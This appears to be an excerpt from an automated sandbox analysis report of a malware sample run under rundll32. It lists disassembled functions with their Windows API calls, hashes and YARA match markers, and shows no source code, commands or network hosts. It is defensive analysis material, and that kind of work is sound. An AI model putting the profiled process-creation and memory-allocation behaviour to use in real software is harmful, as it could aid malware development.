                            • Opcode Fuzzy Hash: d59aed4b7b0ad35c6a5b33b8f8599167dba091afba8d90723f6e3c998515a668
                            • Instruction Fuzzy Hash: D311D6B690010CFFDB119F99ED84CFEBBBDEB89704B10406AE901EA114D679AE45DB20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6A5E7 Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000,7620F730,-00000001,00000000,?,?,?,04F68EF7,?,00000000,000000FF), ref: 04F6A5F8
                            • lstrlen.KERNEL32(?,?,?,?,04F68EF7,?,00000000,000000FF), ref: 04F6A5FF
                            • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 04F6A611
                            • _snprintf.NTDLL ref: 04F6A637
                              • Part of subcall function 04F7C01F: memset.NTDLL ref: 04F7C034
                              • Part of subcall function 04F7C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,774CDBB0,00000020,00000000), ref: 04F7C06D
                              • Part of subcall function 04F7C01F: wcstombs.NTDLL ref: 04F7C077
                              • Part of subcall function 04F7C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,774CDBB0,00000020,00000000), ref: 04F7C0A8
                              • Part of subcall function 04F7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0D4
                              • Part of subcall function 04F7C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 04F7C0EA
                              • Part of subcall function 04F7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0FE
                              • Part of subcall function 04F7C01F: CloseHandle.KERNEL32(?), ref: 04F7C131
                              • Part of subcall function 04F7C01F: CloseHandle.KERNEL32(?), ref: 04F7C136
                            • _snprintf.NTDLL ref: 04F6A66B
                              • Part of subcall function 04F7C01F: GetLastError.KERNEL32 ref: 04F7C102
                              • Part of subcall function 04F7C01F: GetExitCodeProcess.KERNEL32(?,00000001), ref: 04F7C122
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 04F6A688
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                            • String ID:
                            • API String ID: 1481739438-0
                            • Opcode ID: f0536c91c3b1fba9d55a072da9f5ccd76c37e62ab9cf18f281aa8fca8653b5f5
                            • Instruction ID: 3ce038046e88aeba947c8d81726702c9630ea6442d688525b491f40dd775ade0
                            • Opcode Fuzzy Hash: f0536c91c3b1fba9d55a072da9f5ccd76c37e62ab9cf18f281aa8fca8653b5f5
                            • Instruction Fuzzy Hash: 5D115E72A0021DBFCB119F54EC84DAE3F6DEB05364B15805AFE09AB211D639EE15DBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7F791 Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(04F6261E,00000000,00000000,00000008,00000000,?,04F6261E,04F6988B,00000000,?), ref: 04F7F7A7
                            • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 04F7F7BA
                            • lstrcpy.KERNEL32(00000008,04F6261E), ref: 04F7F7DC
                            • GetLastError.KERNEL32(04F64A0A,00000000,00000000,?,04F6261E,04F6988B,00000000,?), ref: 04F7F805
                            • HeapFree.KERNEL32(00000000,00000000,?,04F6261E,04F6988B,00000000,?), ref: 04F7F81D
                            • CloseHandle.KERNEL32(00000000,04F64A0A,00000000,00000000,?,04F6261E,04F6988B,00000000,?), ref: 04F7F826
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                            • String ID:
                            • API String ID: 2860611006-0
                            • Opcode ID: 0101783bd94ae90e68a73e5ee3aded0a9609116a955bfd77d1710080d42d382d
                            • Instruction ID: de571bd87768e61c13ea5e0d0a129fc7a515ed1395d8cdf51d65ff0b78c8a732
                            • Opcode Fuzzy Hash: 0101783bd94ae90e68a73e5ee3aded0a9609116a955bfd77d1710080d42d382d
                            • Instruction Fuzzy Hash: E1115475A0024AFFD7109F64EC848AE7BA8FF00364714452FF926DB110D738AD46DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7508C Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                            • GetCurrentThreadId.KERNEL32 ref: 04F750C4
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                            • lstrcpy.KERNEL32(00000000), ref: 04F75100
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                            • String ID:
                            • API String ID: 1175089793-0
                            • Opcode ID: 5710504b35045a3ec9f5fa9b91d3ea8887b85f90052c9036c4217fb09b9615ff
                            • Instruction ID: 73fbd41458aa3513b3b3b69367015be1cd7445c97a8e57de1ca600d690c59f6e
                            • Opcode Fuzzy Hash: 5710504b35045a3ec9f5fa9b91d3ea8887b85f90052c9036c4217fb09b9615ff
                            • Instruction Fuzzy Hash: 01018472E101197BDB115BA5AC89E7F3BACEF81B85709146AB905DB100DABCFC0687B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F64F2E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F64FB8
                            • lstrlen.KERNEL32(?,?), ref: 04F64FE9
                            • memcpy.NTDLL(00000008,?,00000001), ref: 04F64FF8
                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 04F6507A
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreelstrlenmemcpy
                            • String ID: W
                            • API String ID: 379260646-655174618
                            • Opcode ID: 49ee67706ea911c40efb2e521e942d4c057fe891cb49118e850f8d6e75ce208d
                            • Instruction ID: 37d6ac6cf42e7e47fd8a74488f56d4d601bac8612159f9a6b7742c1625646c3b
                            • Opcode Fuzzy Hash: 49ee67706ea911c40efb2e521e942d4c057fe891cb49118e850f8d6e75ce208d
                            • Instruction Fuzzy Hash: 9D41A331A0024ABFDB24AF58EC847AA77E9EB05304F14942EE45ADF250D335F587DB89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7596C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F75A17
                            • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 04F75A84
                            • GetLastError.KERNEL32(?,00000000,00000000), ref: 04F75A8E
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: BuffersErrorFileFlushLastmemset
                            • String ID: K$P
                            • API String ID: 3817869962-420285281
                            • Opcode ID: da90f6b134fa9d89275e8af695234614f21f0e87e6056b2e5fc0fed19e9e3b10
                            • Instruction ID: 8d598fdee32deca848ae99238284aa7ac9fc13e6c581e7f4b390dd04515bd17c
                            • Opcode Fuzzy Hash: da90f6b134fa9d89275e8af695234614f21f0e87e6056b2e5fc0fed19e9e3b10
                            • Instruction Fuzzy Hash: CE417070A01709AFEB24CFA4C984AAEBBF1FF44704F54992ED48693A40D338B946CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6D0E3 Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                            Download Yara Rule
                            APIs
                            • memcpy.NTDLL(?,04F6DE40,00000000,?,?,?,04F6DE40,?,?,?,?,?), ref: 04F6D121
                            • lstrlen.KERNEL32(04F6DE40,?,?,?,04F6DE40,?,?,?,?,?), ref: 04F6D13F
                            • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 04F6D1AE
                            • lstrlen.KERNEL32(04F6DE40,00000000,00000000,?,?,?,04F6DE40,?,?,?,?,?), ref: 04F6D1CF
                            • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 04F6D1E3
                            • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 04F6D1EC
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04F6D1FA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlenmemcpy$FreeLocal
                            • String ID:
                            • API String ID: 1123625124-0
                            • Opcode ID: fdf58a8ecab65011e3817238f6e9be17f28c43b44a4e8cd17dec69620c739c6a
                            • Instruction ID: 1311c928b3704e0687dba60088dd4071266500544e2a420fa521e7de3d8648b3
                            • Opcode Fuzzy Hash: fdf58a8ecab65011e3817238f6e9be17f28c43b44a4e8cd17dec69620c739c6a
                            • Instruction Fuzzy Hash: 784118B290021AAFEF11DF65EC4189F3BA8EF143A4B05401AFC05A7211E775EE618BE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F62009 Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,04F62028,?), ref: 04F6867A
                              • Part of subcall function 04F68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,04F62028,?), ref: 04F68697
                            • lstrlenW.KERNEL32(?,00000000,?,?,?), ref: 04F62055
                            • lstrlenW.KERNEL32(00000008,?,?,?), ref: 04F6205C
                            • lstrlenW.KERNEL32(?,?,?,?,?), ref: 04F6207A
                            • lstrlen.KERNEL32(00000000,?,00000000), ref: 04F62138
                            • lstrlenW.KERNEL32(?), ref: 04F62143
                            • wsprintfA.USER32 ref: 04F62185
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 04F6F3DB
                              • Part of subcall function 04F6F39B: GetLastError.KERNEL32 ref: 04F6F3E5
                              • Part of subcall function 04F6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 04F6F40A
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 04F6F42D
                              • Part of subcall function 04F6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 04F6F455
                              • Part of subcall function 04F6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 04F6F46A
                              • Part of subcall function 04F6F39B: SetEndOfFile.KERNEL32(00001000), ref: 04F6F477
                              • Part of subcall function 04F6F39B: CloseHandle.KERNEL32(00001000), ref: 04F6F48F
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                            • String ID:
                            • API String ID: 1727939831-0
                            • Opcode ID: dfdeb3f5afb321fb828422d9aa0fa82e90697832162cfab23f948eb57df1e9d9
                            • Instruction ID: a97d7ab992b77f8aa37b72c9be92b97c75f78111498d466674060a566fb24ddc
                            • Opcode Fuzzy Hash: dfdeb3f5afb321fb828422d9aa0fa82e90697832162cfab23f948eb57df1e9d9
                            • Instruction Fuzzy Hash: F2512072900109EFDF01EFA8DD44DAE7BB9EF44304B05846AF915AB251DB39EA12DF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F67DF5 Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                            Download Yara Rule
                            APIs
                            • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,04F75583,00000000,00000000), ref: 04F67E46
                            • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 04F67ED9
                            • GetLastError.KERNEL32(?,?,0000011F), ref: 04F67F31
                            • GetLastError.KERNEL32 ref: 04F67F63
                            • GetLastError.KERNEL32 ref: 04F67F77
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04F75583,00000000,00000000,?,04F63EC6,?), ref: 04F67F8C
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$memcpy
                            • String ID:
                            • API String ID: 2760375183-0
                            • Opcode ID: abd58c2f0f4823d4d688e950a3ebb4777a8310c46d3d60abd4d89da5c11d1ee5
                            • Instruction ID: 72d4f1c493ea43166d7b481c4390c8f58fea7d9140815f2dc504548f0ce994e6
                            • Opcode Fuzzy Hash: abd58c2f0f4823d4d688e950a3ebb4777a8310c46d3d60abd4d89da5c11d1ee5
                            • Instruction Fuzzy Hash: 18512FB1900209BFDF10DFA4DC84EAEBBF9EB44354F104429F916E6240E774AE55DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7ADF7 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpy.KERNEL32(?,00000020), ref: 04F7AEF4
                            • lstrcat.KERNEL32(?,00000020), ref: 04F7AF09
                            • lstrcmp.KERNEL32(00000000,?), ref: 04F7AF20
                            • lstrlen.KERNEL32(?), ref: 04F7AF44
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                            • String ID:
                            • API String ID: 3214092121-3916222277
                            • Opcode ID: da1dfa3768ce675d40ee233472dfc2f407cff02245ca67444e95392eeacc8ee1
                            • Instruction ID: e509ddb873f24594bb38a22598b562730cd22521622ad3edb236847e796fb30a
                            • Opcode Fuzzy Hash: da1dfa3768ce675d40ee233472dfc2f407cff02245ca67444e95392eeacc8ee1
                            • Instruction Fuzzy Hash: BF518F71E00209EBDF21CF99C984AEDBBB6EF45314F06805BE8159F211C778BA52CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6D581 Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5A3
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5B4
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5C6
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5D8
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5EA
                            • lstrlenW.KERNEL32(?,04F83D54,06319A2B,00000057), ref: 04F6D5F6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen
                            • String ID:
                            • API String ID: 1659193697-0
                            • Opcode ID: e4285d7d0a42f80178325b4572fd31d78f941db49b3d592636369fd0558b291a
                            • Instruction ID: 07a080e5bb7826f0722296210155f3f8bc0659955e078dad59e0a0fa014d9529
                            • Opcode Fuzzy Hash: e4285d7d0a42f80178325b4572fd31d78f941db49b3d592636369fd0558b291a
                            • Instruction Fuzzy Hash: 8B412F71F0060AAFCF20DF99C880A6EB7FAFF98204B14896DD556E7600E775E9068F50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F75C28 Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F724C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 04F724CF
                              • Part of subcall function 04F724C3: SetLastError.KERNEL32(000000B7,?,04F75C3C,?,?,00000000,?,?,?), ref: 04F724E0
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 04F75C5C
                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04F75D34
                              • Part of subcall function 04F6A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04F6A990
                              • Part of subcall function 04F6A976: CreateWaitableTimerA.KERNEL32(04F8A1E8,00000001,?), ref: 04F6A9AD
                              • Part of subcall function 04F6A976: GetLastError.KERNEL32(?,00000000,04F78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F6A9BE
                              • Part of subcall function 04F6A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6A9FE
                              • Part of subcall function 04F6A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA1D
                              • Part of subcall function 04F6A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA33
                            • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04F75D1D
                            • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04F75D26
                              • Part of subcall function 04F724C3: CreateMutexA.KERNEL32(04F8A1E8,00000000,?,?,04F75C3C,?,?,00000000,?,?,?), ref: 04F724F3
                            • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 04F75D41
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                            • String ID:
                            • API String ID: 1700416623-0
                            • Opcode ID: 03efcef9fe385be0e87fb228a0e0b309e7f20c85b604ad05b595d28a5c18346b
                            • Instruction ID: 0a8baca138f54c3d3c1c6bc4466efb298cad8cb98643b7ef02c29d8b509e0e62
                            • Opcode Fuzzy Hash: 03efcef9fe385be0e87fb228a0e0b309e7f20c85b604ad05b595d28a5c18346b
                            • Instruction Fuzzy Hash: B3318575E00209AFCB01AF74EC48D7A7BB5EB89314725842AE816DF250E679AC42CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7C20F Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlImageNtHeader.NTDLL(00000000), ref: 04F7C228
                              • Part of subcall function 04F6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04F67D5E), ref: 04F6A6BE
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,04F689E4,00000000), ref: 04F7C26A
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 04F7C2BC
                            • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,04F689E4,00000000), ref: 04F7C2D5
                              • Part of subcall function 04F6E9EC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04F6EA0D
                              • Part of subcall function 04F6E9EC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,04F7C25B,00000000,00000000,00000000,00000001,?,00000000), ref: 04F6EA50
                            • GetLastError.KERNEL32(?,00000000,04F689E4,00000000,?,?,?,?,?,?,?,04F69100,?), ref: 04F7C30D
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                            • String ID:
                            • API String ID: 1921436656-0
                            • Opcode ID: 36f613e6c6ffaf53153fce37a008958b8721f733160fbc068f5b93862835a6b7
                            • Instruction ID: 9602c563ad9011bfeed5ddc311bdfcef048ee6fc170d6863f0901c57c1a489f1
                            • Opcode Fuzzy Hash: 36f613e6c6ffaf53153fce37a008958b8721f733160fbc068f5b93862835a6b7
                            • Instruction Fuzzy Hash: A2311E75E00249AFDF25DFA4DC40EBE7BB5EF08754F00005AEA05AB251D778AD46DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F69FF6 Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 04F6A078
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F6A091
                            • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 04F6A09E
                            • lstrlen.KERNEL32(04F8B3A8,?,?,?,?,?,00000000,00000000,00000000), ref: 04F6A0B0
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 04F6A0E1
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                            • String ID:
                            • API String ID: 2734445380-0
                            • Opcode ID: 239b68c696b2e960b6ef96c55c0d7a6ddc682661d268c0ba6f664fff4570ecf0
                            • Instruction ID: b1b1da22dc024eeb820f1a55d9ddf4649617988487549d95103b6890db990d67
                            • Opcode Fuzzy Hash: 239b68c696b2e960b6ef96c55c0d7a6ddc682661d268c0ba6f664fff4570ecf0
                            • Instruction Fuzzy Hash: 86315C72900209FFDB11DFA5DC88EEE7BB8EF45314F148058F915A6200E779A956DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6DD77 Relevance: 7.6, APIs: 5, Instructions: 91memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,04F63DA2,00000000,00000001,?,?,?), ref: 04F6DD92
                            • lstrlen.KERNEL32(?), ref: 04F6DDA2
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F6DDD6
                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 04F6DE01
                            • memcpy.NTDLL(00000000,?,?), ref: 04F6DE20
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6DE81
                            • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 04F6DEA3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Allocatelstrlenmemcpy$Free
                            • String ID:
                            • API String ID: 3204852930-0
                            • Opcode ID: a792b72c18787b451b2645b5ccf6d423ca27f0f71a7cb9e69f6f0235d9fe7afd
                            • Instruction ID: a4349fe37f3e2d7c5fb5b2f51a04e61008d031c5d33a8243a823a6dbb01cf9e8
                            • Opcode Fuzzy Hash: a792b72c18787b451b2645b5ccf6d423ca27f0f71a7cb9e69f6f0235d9fe7afd
                            • Instruction Fuzzy Hash: 2E3108B2D0020AAFDF11DFA5CC809EE7BB9FF58244F044469E915AB211E731EA55DFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F71ECD Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F770C3: RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F770CB
                              • Part of subcall function 04F770C3: RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F770E0
                              • Part of subcall function 04F770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 04F770F9
                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04F71F04
                            • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,04F78667,?,00000000), ref: 04F71F15
                            • lstrcmpi.KERNEL32(00000002,?), ref: 04F71F5B
                            • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,04F78667,?,00000000), ref: 04F71F6F
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,04F78667,?,00000000), ref: 04F71FB5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                            • String ID:
                            • API String ID: 733514052-0
                            • Opcode ID: 6bb063e2625a6a6158ba901f27143bf2eecb4c07f486be99f67d2ebe6e25aed0
                            • Instruction ID: 623e3fa1b78b1e02ce238619be5ea400f5dc5036b3a57392c0a75095cae06f7a
                            • Opcode Fuzzy Hash: 6bb063e2625a6a6158ba901f27143bf2eecb4c07f486be99f67d2ebe6e25aed0
                            • Instruction Fuzzy Hash: 73318572E00219BFDB109FA4ED84AEE7BB9FF04354F14406AF9059B300D779AD4A9B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6242A Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,04F6243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7D58C
                            • RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F62454
                            • RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F62467
                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04F62478
                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04F624E3
                            • InterlockedIncrement.KERNEL32(04F8A43C), ref: 04F624FA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
